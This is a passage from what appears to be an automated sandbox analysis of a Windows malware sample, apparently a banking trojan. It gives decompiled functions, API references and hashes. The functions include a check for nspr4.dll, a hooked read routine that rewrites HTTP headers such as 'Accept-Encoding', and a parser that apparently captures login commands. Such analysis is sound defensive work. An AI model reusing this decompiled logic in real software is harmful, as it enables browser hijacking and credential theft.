					_v20.top = _t37 >> 0x10;
					_v20.right = _t65 & 0x0000ffff;
					_v20.left = _t37 & 0x0000ffff;
					_v20.bottom = _t65 >> 0x10;
					E004176A1( &_v20, _t65 >> 0x10, _t37 & 0x0000ffff, 0x41fe78, _a4, 0);
					goto L23;
				} else {
					_t70 = GetMenu(_a4);
					if(_t70 == 0) {
						goto L23;
					}
					_v24 = _v24 | 0xffffffff;
					_t46 = GetMenuItemCount(_t70);
					_t63 = 0;
					_v28 = _t46;
					if(_t46 <= 0) {
						L8:
						_t47 =  *0x41fe88;
						_push(_t47[0x104]);
						_t64 = MenuItemFromPoint(_a4, _t70, _t47[0x100]);
						if(_t64 == 0xffffffff) {
							goto L23;
						}
						_v28 = GetMenuState(_t70, _t64, 0x400);
						if(_v24 != _t64) {
							EndMenu();
						}
						HiliteMenuItem(_a4, _t70, _t64, 0x480);
						if(_a8 != 0xfffffffe && (_v28 & 0x00000003) == 0) {
							if((_v28 & 0x00000010) == 0) {
								if((_v28 & 0x00000800) == 0) {
									_t51 = GetMenuItemID(_t70, _t64);
									if(_t51 == 0xffffffff) {
										goto L23;
									}
									L20:
									SendMessageW(_a4, 0x111, _t51 & 0x0000ffff, 0);
									goto L23;
								}
								_t51 = 0;
								goto L20;
							}
							_t74 = GetSubMenu(_t70, _t64);
							if(_t74 != 0 && GetMenuItemRect(_a4, _t70, _t64,  &_v20) != 0) {
								TrackPopupMenuEx(_t74, 0x4000, _v20, _v20.bottom, _a4, 0);
							}
						}
						goto L23;
					} else {
						goto L5;
					}
					do {
						L5:
						if(GetMenuState(_t70, _t63, 0x400) < 0) {
							HiliteMenuItem(_a4, _t70, _t63, 0x400);
							_v24 = _t63;
						}
						_t63 = _t63 + 1;
					} while (_t63 < _v28);
					goto L8;
				}
			}

0x004181e9
0x004181ef
0x004181f8
0x004181fb
0x0041837a
0x00418380
0x00418386
0x00418394
0x00418394
0x00418201
0x00418349
0x00418355
0x00418365
0x00418369
0x0041836d
0x00000000
0x00418210
0x00418219
0x0041821d
0x00000000
0x00000000
0x00418223
0x00418229
0x0041822f
0x00418231
0x0041823c
0x00418262
0x00418262
0x00418267
0x0041827d
0x00418282
0x00000000
0x00000000
0x00418291
0x00418299
0x0041829b
0x0041829b
0x004182ab
0x004182b5
0x004182cb
0x0041831a
0x00418322
0x0041832b
0x00000000
0x00000000
0x0041832d
0x0041833b
0x00000000
0x0041833b
0x0041831c
0x00000000
0x0041831c
0x004182d5
0x004182d9
0x0041830a
0x0041830a
0x004182d9
0x00000000
0x00000000
0x00000000
0x00000000
0x0041823e
0x0041823e
0x00418249
0x00418251
0x00418257
0x00418257
0x0041825b
0x0041825c
0x00000000
0x0041823e

APIs

GetMenu.USER32(?), ref: 00418213
GetMenuItemCount.USER32 ref: 00418229
GetMenuState.USER32 ref: 00418241
HiliteMenuItem.USER32(?,00000000,00000000,00000400), ref: 00418251
MenuItemFromPoint.USER32(?,00000000,?,?), ref: 00418277
GetMenuState.USER32 ref: 0041828B
EndMenu.USER32 ref: 0041829B
HiliteMenuItem.USER32(?,00000000,00000000,00000480), ref: 004182AB
GetSubMenu.USER32 ref: 004182CF
GetMenuItemRect.USER32(?,00000000,00000000,?), ref: 004182E9
TrackPopupMenuEx.USER32(00000000,00004000,?,?,?,00000000), ref: 0041830A
GetMenuItemID.USER32(00000000,00000000), ref: 00418322
SendMessageW.USER32(?,00000111,?,00000000), ref: 0041833B
SetKeyboardState.USER32 ref: 0041837A
SetEvent.KERNEL32 ref: 00418386

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: Menu$Item$State$Hilite$CountEventFromKeyboardMessagePointPopupRectSendTrack
String ID:
API String ID: 751066993-0
Opcode ID: 019f1a0c9b77ade17ba2df6d538d9c45518256ab5fc9d18cd9e52bfb25cba943
Instruction ID: 2d1dbc59354d850a094600d5ead6656028fd57d8eaa7bc4142bdb1ca9abb59f5
Opcode Fuzzy Hash: 019f1a0c9b77ade17ba2df6d538d9c45518256ab5fc9d18cd9e52bfb25cba943
Instruction Fuzzy Hash: A141C130004308AFD7119F24DD48EAB7AA8EF85B64F08472EFDA5A11B0DB358995DB59

Uniqueness

Uniqueness Score: -1.00%

Function 004197C3, Relevance: 18.3, APIs: 9, Strings: 3, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 81%

			E004197C3(void* __edx, intOrPtr _a4, signed int _a8, signed char _a12) {
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v56;
				signed int _v72;
				char _v76;
				signed int _v80;
				signed int _v84;
				signed char _v88;
				signed int _v92;
				signed int _v100;
				intOrPtr _v104;
				signed int _v108;
				intOrPtr _v128;
				void* __esi;
				signed int _t111;
				signed int _t113;
				signed char _t114;
				signed int _t115;
				void* _t117;
				signed char _t121;
				signed int _t122;
				signed int _t125;
				signed int _t128;
				signed char _t130;
				signed char _t136;
				intOrPtr _t149;
				void* _t165;
				signed char _t166;
				void* _t172;
				intOrPtr _t178;
				signed int _t184;
				void* _t186;
				void* _t188;
				signed int _t202;
				signed int _t203;

				if(E00406B23() == 0 || _a8 == 0 || _a12 <= 0) {
					L9:
					_t111 =  *0x42000c(_a4, _a8, _a12);
					goto L10;
				} else {
					EnterCriticalSection(0x42001c);
					_t192 = _a4;
					_t184 = E00418847(_a4);
					_v84 = _t184;
					if(_t184 == 0xffffffff) {
						L8:
						LeaveCriticalSection(0x42001c);
						goto L9;
					}
					_t186 = _t184 * 0x38 +  *0x420038;
					if( *(_t186 + 0x20) > 0) {
						L29:
						_t113 =  *(_t186 + 0x24);
						_t188 =  *(_t186 + 0x20) - _t113;
						LeaveCriticalSection(0x42001c);
						_t195 = _a4;
						_t114 =  *0x42000c(_a4,  *((intOrPtr*)(_t186 + 0x1c)) + _t113, _t188);
						_v88 = _t114;
						__eflags = _t114 - 0xffffffff;
						if(_t114 != 0xffffffff) {
							EnterCriticalSection(0x42001c);
							_t115 = E00418847(_t195);
							__eflags = _t115 - 0xffffffff;
							if(_t115 != 0xffffffff) {
								_t166 = _v88;
								_t117 = _t115 * 0x38 +  *0x420038;
								__eflags = _t166 - _t188;
								if(_t166 != _t188) {
									 *((intOrPtr*)(_t117 + 0x24)) =  *((intOrPtr*)(_t117 + 0x24)) + _t166;
									_t92 = _t117 + 0x28;
									 *_t92 =  *(_t117 + 0x28) - 1;
									__eflags =  *_t92;
									_v88 = 1;
								} else {
									_t88 = _t117 + 0x1c; // -4325404
									_v88 =  *(_t117 + 0x28);
									E004111B9(E00411106( *_t88), _t88, 0, 0x10);
								}
							} else {
								_v88 = _v88 | _t115;
								 *0x420018(0xffffe890, 8);
							}
							LeaveCriticalSection(0x42001c);
						}
						L36:
						_t111 = _v88;
						L10:
						return _t111;
					}
					if( *(_t186 + 8) > 0) {
						L38:
						LeaveCriticalSection(0x42001c);
						_t197 = _a4;
						_t121 =  *0x42000c(_a4, _a8, _a12);
						_v88 = _t121;
						__eflags = _t121 - 0xffffffff;
						if(_t121 != 0xffffffff) {
							EnterCriticalSection(0x42001c);
							_t122 = E00418847(_t197);
							__eflags = _t122 - 0xffffffff;
							if(_t122 != 0xffffffff) {
								_t172 = _t122 * 0x38 +  *0x420038;
								_t178 =  *((intOrPtr*)(_t172 + 8));
								__eflags = _v88 - _t178;
								if(_v88 > _t178) {
									E00418905(_t122);
								} else {
									 *((intOrPtr*)(_t172 + 8)) = _t178 - _v88;
								}
							} else {
								_v88 = _v88 | _t122;
								 *0x420018(0xffffe890, 8);
							}
							LeaveCriticalSection(0x42001c);
						}
						goto L36;
					}
					_t125 = E00418D3B( &_v76, _t192, _a8, _a12);
					_v92 = _t125;
					if(_t125 != 0xffffffff) {
						__eflags = _v72;
						if(_v72 == 0) {
							L37:
							E00408E76( &_v76);
							_t128 = _v80 + _a12;
							__eflags = _t128;
							 *(_t186 + 8) = _t128;
							goto L38;
						}
						_t130 = E004085D4( &_v76);
						_v88 = _t130;
						__eflags = _t130 & 0x00000001;
						if((_t130 & 0x00000001) == 0) {
							_v92 = 0;
							_v88 = 0;
							__eflags = _t130 & 0x00000002;
							if(__eflags != 0) {
								_t203 = E00411159(__eflags, _a8, _a12);
								_v100 = _t203;
								__eflags = _t203;
								if(_t203 != 0) {
									E00408EE0( *((intOrPtr*)(_t186 + 0x10)),  *((intOrPtr*)(_t186 + 0xc)));
									E00411106( *(_t186 + 0x14));
									E00411106( *((intOrPtr*)(_t186 + 4)));
									_t149 = E00411564(_v76, _v80);
									 *(_t186 + 0x14) =  *(_t186 + 0x14) & 0x00000000;
									_t38 = _t186 + 0x18;
									 *_t38 =  *(_t186 + 0x18) & 0x00000000;
									__eflags =  *_t38;
									 *((intOrPtr*)(_t186 + 4)) = _t149;
									 *((intOrPtr*)(_t186 + 0xc)) = _v36;
									 *((intOrPtr*)(_t186 + 0x10)) = _v32;
									_v128 = E00415DE7(E00415DE7(E00415E63(_t203, _a12, "Accept-Encoding", "identity"), _t165, _t203, "TE"), _t165, _t203, "If-Modified-Since");
								} else {
									E00408EE0(_v16, _v20);
								}
							}
							__eflags = _v84 & 0x00000004;
							if((_v84 & 0x00000004) == 0) {
								L27:
								__eflags = _v92;
								if(_v92 == 0) {
									goto L37;
								}
								E00408E76( &_v76);
								_t70 = _t186 + 0x24;
								 *_t70 =  *(_t186 + 0x24) & 0x00000000;
								__eflags =  *_t70;
								 *(_t186 + 8) = _v80;
								 *((intOrPtr*)(_t186 + 0x1c)) = _v92;
								 *(_t186 + 0x20) = _v88;
								 *(_t186 + 0x28) = _a12;
								goto L29;
							}
							_t202 = _v92;
							__eflags = _t202;
							if(__eflags != 0) {
								_t136 = _v88;
							} else {
								_t202 = _a8;
								_t136 = _a12;
							}
							_v84 = _t136;
							_v104 = E0041901B(_v84, __eflags, _t202, _v40, _v36,  &_v92);
							E00411106(_v56);
							__eflags = _v108;
							if(_v108 != 0) {
								__eflags = _t202 - _a8;
								if(_t202 != _a8) {
									E00411106(_t202);
								}
							} else {
								__eflags = _t202 - _a8;
								if(_t202 == _a8) {
									goto L37;
								}
								_v92 = _t202;
								_v88 = _v84;
							}
							goto L27;
						} else {
							E00408E76( &_v76);
							LeaveCriticalSection(0x42001c);
							_t111 =  *0x420018(0xffffe8a3, 0) | 0xffffffff;
							goto L10;
						}
					} else {
						E00418905(_v84);
						E00408E76( &_v76);
						goto L8;
					}
				}
			}

0x004197d6
0x0041984e
0x00419857
0x00000000
0x004197e4
0x004197ea
0x004197f0
0x004197f8
0x004197fa
0x00419801
0x00419847
0x00419848
0x00000000
0x00419848
0x00419806
0x00419810
0x004199ec
0x004199ec
0x004199f8
0x004199fa
0x00419a02
0x00419a06
0x00419a0f
0x00419a13
0x00419a16
0x00419a19
0x00419a1f
0x00419a24
0x00419a27
0x00419a3e
0x00419a45
0x00419a4b
0x00419a4d
0x00419a6c
0x00419a6f
0x00419a6f
0x00419a6f
0x00419a72
0x00419a4f
0x00419a52
0x00419a57
0x00419a65
0x00419a65
0x00419a29
0x00419a29
0x00419a34
0x00419a3b
0x00419a7b
0x00419a7b
0x00419a81
0x00419a81
0x00419860
0x00419866
0x00419866
0x0041981a
0x00419a9d
0x00419aa4
0x00419aa9
0x00419ab0
0x00419ab9
0x00419abd
0x00419ac0
0x00419ac3
0x00419ac9
0x00419ace
0x00419ad1
0x00419aed
0x00419af3
0x00419af6
0x00419afa
0x00419b05
0x00419afc
0x00419b00
0x00419b00
0x00419ad3
0x00419ad3
0x00419ade
0x00419ae5
0x00419b0b
0x00419b0b
0x00000000
0x00419ac0
0x0041982b
0x00419830
0x00419837
0x00419869
0x0041986d
0x00419a8a
0x00419a8e
0x00419a97
0x00419a97
0x00419a9a
0x00000000
0x00419a9a
0x00419878
0x0041987d
0x00419881
0x00419883
0x004198a9
0x004198ad
0x004198b1
0x004198b3
0x004198c4
0x004198c6
0x004198ca
0x004198cc
0x004198e3
0x004198eb
0x004198f3
0x00419900
0x00419905
0x00419909
0x00419909
0x00419909
0x00419912
0x00419921
0x00419929
0x00419949
0x004198ce
0x004198d6
0x004198d6
0x004198cc
0x0041994d
0x00419952
0x004199b9
0x004199b9
0x004199be
0x00000000
0x00000000
0x004199c8
0x004199d1
0x004199d1
0x004199d1
0x004199d5
0x004199dc
0x004199e3
0x004199e9
0x00000000
0x004199e9
0x00419954
0x00419958
0x0041995a
0x00419964
0x0041995c
0x0041995c
0x0041995f
0x0041995f
0x00419968
0x00419987
0x0041998b
0x00419990
0x00419995
0x004199ae
0x004199b1
0x004199b4
0x004199b4
0x00419997
0x00419997
0x0041999a
0x00000000
0x00000000
0x004199a4
0x004199a8
0x004199a8
0x00000000
0x00419885
0x00419889
0x0041988f
0x004198a4
0x00000000
0x004198a4
0x00419839
0x0041983d
0x00419842
0x00000000
0x00419842
0x00419837

APIs

Part of subcall function 00406B23: WaitForSingleObject.KERNEL32(00000000,00409585,000002E8,00000000,000002E8,2C7DCEF4,00000002), ref: 00406B2B

EnterCriticalSection.KERNEL32(0042001C), ref: 004197EA
LeaveCriticalSection.KERNEL32(0042001C), ref: 00419848
LeaveCriticalSection.KERNEL32(0042001C), ref: 0041988F
LeaveCriticalSection.KERNEL32(0042001C), ref: 004199FA
EnterCriticalSection.KERNEL32(0042001C), ref: 00419A19
LeaveCriticalSection.KERNEL32(0042001C), ref: 00419A7B
LeaveCriticalSection.KERNEL32(0042001C), ref: 00419AA4
EnterCriticalSection.KERNEL32(0042001C), ref: 00419AC3
LeaveCriticalSection.KERNEL32(0042001C), ref: 00419B0B

Strings

If-Modified-Since, xrefs: 0041993D
identity, xrefs: 0041990D
Accept-Encoding, xrefs: 00419919

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Leave$Enter$ObjectSingleWait
String ID: Accept-Encoding$If-Modified-Since$identity
API String ID: 3286975823-3034467039
Opcode ID: a517665282843712a44bc99b5fb404d734306f815c0b257ec3ae7a83be7f45cb
Instruction ID: 5cc992ec4ac5a7bb6336a84082a90f235dbe752f701ce13370ecb84fd6b3d7d4
Opcode Fuzzy Hash: a517665282843712a44bc99b5fb404d734306f815c0b257ec3ae7a83be7f45cb
Instruction Fuzzy Hash: 5FA19E71504301EFCB10EF24D845A9ABBE4FF88354F104A2EF955A32A1D738ED95CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 00418086, Relevance: 18.1, APIs: 12, Instructions: 78
filesynchronizationthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00418086(void** __eax, char _a4) {
				void* __esi;
				void* _t15;
				void* _t16;
				long _t17;
				void* _t18;
				void* _t19;
				void* _t20;
				void* _t21;
				void* _t22;
				struct HDC__* _t23;
				void* _t24;
				void* _t25;
				void** _t41;

				_t41 = __eax;
				_t15 =  *(__eax + 0x1c);
				if(_t15 != 0) {
					DeleteObject(_t15);
				}
				_t16 = _t41[3];
				if(_t16 != 0) {
					CloseHandle(_t16);
				}
				_t17 = _t41[1];
				if(_t17 != 0xffffffff) {
					TlsFree(_t17);
				}
				_t18 = _t41[5];
				if(_t18 != 0) {
					CloseHandle(_t18);
				}
				_t19 = _t41[4];
				if(_t19 != 0) {
					UnmapViewOfFile(_t19);
				}
				_t20 =  *_t41;
				if(_t20 != 0) {
					_t20 = CloseHandle(_t20);
				}
				if(_a4 != 0) {
					_t21 = _t41[0x56];
					if(_t21 != 0) {
						SelectObject(_t41[0x55], _t21);
					}
					_t22 = _t41[0x57];
					if(_t22 != 0) {
						DeleteObject(_t22);
					}
					_t23 = _t41[0x55];
					if(_t23 != 0) {
						DeleteDC(_t23);
					}
					_t24 = _t41[0x58];
					if(_t24 != 0) {
						CloseHandle(_t24);
					}
					_t25 = _t41[0x60];
					if(_t25 != 0 && WaitForSingleObject(_t25, 0) != 0x102) {
						PostThreadMessageW(_t41[0x62], 0x12, 0, 0);
					}
					_t20 = E00412B15( &(_t41[0x5f]));
				}
				return _t20;
			}

0x0041808e
0x00418090
0x00418096
0x00418099
0x00418099
0x0041809b
0x004180a6
0x004180a9
0x004180a9
0x004180ab
0x004180b1
0x004180b4
0x004180b4
0x004180ba
0x004180bf
0x004180c2
0x004180c2
0x004180c4
0x004180c9
0x004180cc
0x004180cc
0x004180d2
0x004180d6
0x004180d9
0x004180d9
0x004180e0
0x004180e2
0x004180ea
0x004180f3
0x004180f3
0x004180f9
0x00418101
0x00418104
0x00418104
0x00418106
0x0041810e
0x00418111
0x00418111
0x00418117
0x0041811f
0x00418122
0x00418122
0x00418124
0x0041812c
0x0041814a
0x0041814a
0x00418156
0x00418156
0x0041815e

APIs

DeleteObject.GDI32(?), ref: 00418099
CloseHandle.KERNEL32(?,00000000,0041FE78,00000000,004181E4,00000000,00000000,0000004C,92D1E1EB,?,00000000), ref: 004180A9
TlsFree.KERNEL32(?,00000000,0041FE78,00000000,004181E4,00000000,00000000,0000004C,92D1E1EB,?,00000000), ref: 004180B4
CloseHandle.KERNEL32(?,00000000,0041FE78,00000000,004181E4,00000000,00000000,0000004C,92D1E1EB,?,00000000), ref: 004180C2
UnmapViewOfFile.KERNEL32(?,00000000,0041FE78,00000000,004181E4,00000000,00000000,0000004C,92D1E1EB,?,00000000), ref: 004180CC
CloseHandle.KERNEL32(?,00000000,0041FE78,00000000,004181E4,00000000,00000000,0000004C,92D1E1EB,?,00000000), ref: 004180D9
SelectObject.GDI32(?,?), ref: 004180F3
DeleteObject.GDI32(?), ref: 00418104
DeleteDC.GDI32(?), ref: 00418111
CloseHandle.KERNEL32(?,00000000,0041FE78,00000000,004181E4,00000000,00000000,0000004C,92D1E1EB,?,00000000), ref: 00418122
WaitForSingleObject.KERNEL32(?,00000000,00000000,0041FE78,00000000,004181E4,00000000,00000000,0000004C,92D1E1EB,?,00000000), ref: 00418131
PostThreadMessageW.USER32 ref: 0041814A

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CloseHandleObject$Delete$FileFreeMessagePostSelectSingleThreadUnmapViewWait
String ID:
API String ID: 1699860549-0
Opcode ID: 1bc74938c939026bc6294649e60a2b535c477aece0aee8a89f9e4513dbc66d61
Instruction ID: 359614e0edb77f81741b0e24e21b0a670b9595fad6c316ffde1cd28e33252492
Opcode Fuzzy Hash: 1bc74938c939026bc6294649e60a2b535c477aece0aee8a89f9e4513dbc66d61
Instruction Fuzzy Hash: F8210C71700704ABD6309B799D88B97B7ECAF48741F05492DF959E33A0CF38E8858A28

Uniqueness

Uniqueness Score: -1.00%

Function 0040641D, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040641D(void* __ecx, void* __edx, void* __eflags) {
				long _v8;
				signed int _v12;
				void _v532;
				void* __edi;
				unsigned int _t22;
				void* _t30;
				void* _t39;
				void* _t41;
				WCHAR* _t42;
				void* _t43;
				void* _t46;

				_t41 = __edx;
				_t39 = __ecx;
				InitializeCriticalSection(0x41ec28);
				 *0x41ebbc = 0;
				 *0x41ec24 = 0;
				 *0x41e58c = 0;
				 *0x41eabc = 0;
				 *0x41eac0 = 0;
				InitializeCriticalSection(0x41eaa4);
				_t42 =  &_v532;
				E00406D1E(_t39, _t42, 0);
				_v12 = _v12 | 0xffffffff;
				_v8 = 0x1fe;
				_t43 = CreateFileW(_t42, 0x80000000, 1, 0, 3, 0, 0);
				if(_t43 != 0xffffffff) {
					if(ReadFile(_t43,  &_v532, _v8,  &_v8, 0) != 0) {
						_v12 = _v8;
					}
					CloseHandle(_t43);
				}
				_t22 = _v12;
				if(_t22 == 0xffffffff || (_t22 & 0x00000001) != 0) {
					_t22 = 0;
				}
				 *((short*)(_t46 + (_t22 >> 1) * 2 - 0x210)) = 0;
				E0040F4AE( &_v532);
				E00418C01( &_v532);
				 *0x41e404 = 0;
				 *0x41e484 = 0;
				InitializeCriticalSection("hl�A");
				E00418161(_t41);
				if(GetModuleHandleW(L"nspr4.dll") == 0) {
					_t30 = 0;
				} else {
					_t30 = E0040EF97(0, _t41, _t29);
				}
				if(_t30 != 0) {
					 *0x41ec5c =  *0x41ec5c | 0x00000001;
				}
				E0040ED74();
				return 1;
			}

0x0040641d
0x0040641d
0x00406434
0x0040643f
0x00406445
0x0040644b
0x00406451
0x00406457
0x0040645d
0x00406460
0x00406466
0x0040646b
0x0040647e
0x0040648b
0x00406490
0x004064aa
0x004064af
0x004064af
0x004064b3
0x004064b3
0x004064b9
0x004064bf
0x004064c5
0x004064c5
0x004064cb
0x004064d9
0x004064e4
0x004064ee
0x004064f4
0x004064fa
0x004064fc
0x0040650e
0x00406519
0x00406510
0x00406512
0x00406512
0x0040651d
0x0040651f
0x0040651f
0x00406526
0x00406531

APIs

InitializeCriticalSection.KERNEL32(0041EC28,00000000,74B04EE0,00000000), ref: 00406434
InitializeCriticalSection.KERNEL32(0041EAA4), ref: 0040645D

Part of subcall function 00406D1E: PathRenameExtensionW.SHLWAPI(?,.dat,?,0041E5F0,00000000,00000032,?,77E49EB0,00000000), ref: 00406D97

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00406485
ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 004064A2
CloseHandle.KERNEL32(00000000), ref: 004064B3
InitializeCriticalSection.KERNEL32(hlA), ref: 004064FA
GetModuleHandleW.KERNEL32(nspr4.dll), ref: 00406506

Strings

nspr4.dll, xrefs: 00406501
hlA, xrefs: 004064E9

Memory Dump Source

Source File: 00000001.00000002.199597354.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.199612984.0000000000421000.00000040.00020000.sdmp Download File

Similarity

API ID: CriticalInitializeSection$FileHandle$CloseCreateExtensionModulePathReadRename
String ID: hlA$nspr4.dll
API String ID: 1155594396-157834734
Opcode ID: 32a0e5709f7ff4511ad30742ad47f4ef14c6b276f994843e25bdd32ef71faf1f
Instruction ID: 7862906d76c7f3752746b64df8a201ac02792f24f1b49d42e0b26332122835ca
Opcode Fuzzy Hash: 32a0e5709f7ff4511ad30742ad47f4ef14c6b276f994843e25bdd32ef71faf1f
Instruction Fuzzy Hash: FF21C135500208ABC710AFAA9D85AEE7BA8BB44314F10457FF816F32E0D6784A968F5C

Uniqueness

Uniqueness Score: -1.00%

Function 0040591C, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 194
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040591C(void* __eax, signed int* __ecx, signed int __edx, intOrPtr _a4) {
				char _v536;
				char _v652;
				char _v664;
				char _v696;
				char _v700;
				char _v701;
				char _v708;
				void* __esi;
				char* _t35;
				void* _t40;
				char* _t43;
				intOrPtr _t44;
				void* _t47;
				void* _t54;
				void* _t56;
				intOrPtr _t57;
				signed int _t58;
				signed int _t60;
				void* _t61;
				signed int* _t71;
				intOrPtr _t73;
				signed int _t75;
				signed char _t76;
				intOrPtr _t79;
				signed int _t80;
				intOrPtr _t83;
				signed int* _t84;
				intOrPtr _t85;
				void* _t87;
				char* _t92;
				void* _t93;
				intOrPtr* _t94;

				_t80 = __edx;
				_t87 = __eax;
				_t71 = __ecx;
				if(_a4 == 0xffffffff || __ecx == 0 || __eax > 0x200) {
					L51:
					_t35 = 0;
					__eflags = 0;
				} else {
					if(__eax <= 6) {
						L24:
						__eflags = _t87 - 1;
						if(_t87 <= 1) {
							goto L51;
						} else {
							EnterCriticalSection(0x41e46c);
							_t83 = E00405814(_a4);
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags =  *((intOrPtr*)(_t83 + 4));
								if( *((intOrPtr*)(_t83 + 4)) == 0) {
									L48:
									_push(0);
									goto L49;
								} else {
									__eflags =  *((intOrPtr*)(_t83 + 8));
									if( *((intOrPtr*)(_t83 + 8)) == 0) {
										goto L48;
									} else {
										__eflags = _t87 - 3;
										if(_t87 < 3) {
											L33:
											__eflags = _t87 - 4;
											if(_t87 >= 4) {
												_t75 =  *_t71 ^ 0x0200099a;
												__eflags = _t75 - 0x475050ce;
												if(_t75 == 0x475050ce) {
													goto L37;
												} else {
													__eflags = _t75 - 0x56414cdc;
													if(_t75 == 0x56414cdc) {
														goto L37;
													} else {
														__eflags = _t75 - 0x545348ca;
														if(_t75 != 0x545348ca) {
															__eflags = _t75 - 0x56415dc9;
															if(_t75 == 0x56415dc9) {
																L40:
																_t76 = 0x65;
																_push(0x13);
																goto L41;
															} else {
																__eflags = _t75 - 0x565340d6;
																if(_t75 == 0x565340d6) {
																	goto L40;
																}
															}
														} else {
															goto L37;
														}
													}
												}
											}
										} else {
											_t58 =  *_t71;
											__eflags = _t58 - 0x43;
											if(_t58 == 0x43) {
												L31:
												__eflags = _t71[0] - 0x57;
												if(_t71[0] != 0x57) {
													goto L33;
												} else {
													__eflags = _t71[0] - 0x44;
													if(_t71[0] == 0x44) {
														L37:
														_t76 = 0x64;
														_push(0x12);
														L41:
														_pop(_t40);
														E0040CA33(_t40,  &_v696);
														_t43 =  &_v652;
														_v700 = 0x80;
														__imp__#5(_a4, _t43,  &_v700);
														__eflags = _t43;
														if(_t43 == 0) {
															_t78 =  &_v664;
															_t44 = E0041448A( &_v664);
															__eflags = _t44;
															if(_t44 == 0) {
																__eflags = _t76 - 0x65;
																if(_t76 == 0x65) {
																	L46:
																	E00414441( &_v664, _t78,  &_v536);
																	_t47 = 0x11;
																	E0040CA33(_t47,  &_v696);
																	_push( &_v536);
																	_push( *((intOrPtr*)(_t83 + 8)));
																	_push( *((intOrPtr*)(_t83 + 4)));
																	E00410F70(_t78, _t80, __eflags, _t76 & 0x000000ff, 0, 0,  &_v696,  &_v708);
																} else {
																	__eflags = _t76 - 0x64;
																	if(_t76 == 0x64) {
																		_t92 =  &_v696;
																		_t54 = 0x14;
																		E0040CA33(_t54, _t92);
																		_push( *((intOrPtr*)(_t83 + 4)));
																		_t80 = _t80 | 0xffffffff;
																		_t56 = 9;
																		_t78 = _t92;
																		_t57 = E00411D16(_t56, _t92, _t80);
																		__eflags = _t57;
																		if(_t57 != 0) {
																			goto L46;
																		}
																	}
																}
															}
														}
														_push(0);
														L49:
														E004058B3(_t83);
													} else {
														goto L33;
													}
												}
											} else {
												__eflags = _t58 - 0x50;
												if(_t58 != 0x50) {
													goto L33;
												} else {
													goto L31;
												}
											}
										}
									}
								}
							}
							_t73 = 0;
							goto L23;
						}
					} else {
						_t60 =  *__ecx ^ 0x0200099a;
						if(_t60 == 0x50455acf || _t60 == 0x515348ca) {
							if(_t71[1] != 0x20) {
								goto L24;
							} else {
								_t61 = 0;
								_t93 = _t87 + 0xfffffffb;
								_t84 =  &(_t71[1]);
								if(_t93 == 0) {
									goto L51;
								} else {
									while(1) {
										_t79 =  *((intOrPtr*)(_t61 + _t84));
										if(_t79 == 0xd || _t79 == 0xa) {
											break;
										}
										if(_t79 < 0x20) {
											goto L51;
										} else {
											_t61 = _t61 + 1;
											if(_t61 < _t93) {
												continue;
											} else {
												break;
											}
										}
										goto L52;
									}
									if(_t61 == 0 || _t61 == _t93) {
										goto L51;
									} else {
										_t85 = E00411346(_t61, 0xfde9, _t84);
										if(_t85 == 0) {
											goto L51;
										} else {
											_v701 = 0;
											EnterCriticalSection(0x41e46c);
											_t94 = E00405814(_a4);
											if(_t94 != 0) {
												L18:
												__eflags =  *_t71 - 0x55;
												_v701 = 1;
												if( *_t71 != 0x55) {
													E00411106( *((intOrPtr*)(_t94 + 8)));
													 *((intOrPtr*)(_t94 + 8)) = _t85;
												} else {
													E004058B3(_t94, 1);
													 *((intOrPtr*)(_t94 + 4)) = _t85;
												}
												 *_t94 = _a4;
											} else {
												_t94 = E0040584D(_a4);
												if(_t94 != 0) {
													goto L18;
												} else {
													E00411106(_t85);
												}
											}
											_t73 = _v701;
											L23:
											LeaveCriticalSection(0x41e46c);
											_t35 = _t73;
										}
									}
								}
							}
						} else {
							goto L24;
						}
					}
				}
				L52:
				return _t35;
			}

0x0040591c
0x0040592f
0x00405931
0x00405933
0x00405b8a
0x00405b8a
0x00405b8a
0x0040594d
0x00405950
0x00405a39
0x00405a39
0x00405a3c
0x00000000
0x00405a42
0x00405a47
0x00405a55
0x00405a59
0x00405a5b
0x00405a61
0x00405a64
0x00405b7b
0x00405b7b
0x00000000
0x00405a6a
0x00405a6a
0x00405a6d
0x00000000
0x00405a73
0x00405a73
0x00405a76
0x00405a8e
0x00405a8e
0x00405a91
0x00405a99
0x00405a9f
0x00405aa5
0x00000000
0x00405aa7
0x00405aa7
0x00405aad
0x00000000
0x00405aaf
0x00405aaf
0x00405ab5
0x00405abd
0x00405ac3
0x00405ad1
0x00405ad1
0x00405ad3
0x00000000
0x00405ac5
0x00405ac5
0x00405acb
0x00000000
0x00000000
0x00405acb
0x00000000
0x00000000
0x00000000
0x00405ab5
0x00405aad
0x00405aa5
0x00405a78
0x00405a78
0x00405a7a
0x00405a7c
0x00405a82
0x00405a82
0x00405a86
0x00000000
0x00405a88
0x00405a88
0x00405a8c
0x00405ab7
0x00405ab7
0x00405ab9
0x00405ad5
0x00405ad9
0x00405ada
0x00405ae4
0x00405aec
0x00405af4
0x00405afa
0x00405afc
0x00405afe
0x00405b02
0x00405b07
0x00405b09
0x00405b0b
0x00405b0e
0x00405b35
0x00405b40
0x00405b4b
0x00405b4c
0x00405b58
